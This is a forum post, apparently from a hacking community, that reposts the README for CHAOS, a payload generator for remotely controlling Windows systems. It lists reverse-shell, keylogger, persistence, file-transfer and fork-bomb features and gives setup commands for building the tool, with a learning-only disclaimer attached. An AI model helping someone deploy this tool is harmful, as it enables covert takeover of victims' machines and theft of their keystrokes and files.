Jump to content
Fi8sVrs

CHAOS Payload Generator

Recommended Posts

  • Active Members

CHAOS allow generate payloads and control remote Windows systems.

logo.png

Disclaimer

books This project was created only for learning purpose.

THIS SOFTWARE IS PROVIDED "AS IS" WITHOUT WARRANTY OF ANY KIND. YOU MAY USE THIS SOFTWARE AT YOUR OWN RISK. THE USE IS COMPLETE RESPONSIBILITY OF THE END-USER. THE DEVELOPERS ASSUME NO LIABILITY AND ARE NOT RESPONSIBLE FOR ANY MISUSE OR DAMAGE CAUSED BY THIS PROGRAM.

 

Features

  • Reverse Shell
  • Download File
  • Upload File
  • Screenshot new
  • Keylogger new
  • Persistence
  • Open URL Remotely
  • Get Operating System Name
  • Run Fork Bomb

 

Tested On

Kali) Kali Linux - ROLLING EDITION

 

How To Use

# Install dependencies (You need Golang and UPX package installed)
$ apt install golang xterm git upx-ucl -y

# Clone this repository
$ git clone https://github.com/tiagorlampert/CHAOS.git

# Get and install external imports (requirement to screenshot)
$ go get github.com/kbinani/screenshot && go get github.com/lxn/win
$ go install github.com/kbinani/screenshot && go install github.com/lxn/win

# Maybe you will see the message "package github.com/lxn/win: build constraints exclude all Go files".
# It's occurs because the libraries are to windows systems, but it necessary to build the payload.

# Go into the repository
$ cd CHAOS

# Run
$ go run CHAOS.go

Screenshot (outdated)

screenshot.gif

 

Video

 

 

Source

 

  • Thanks 1
Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...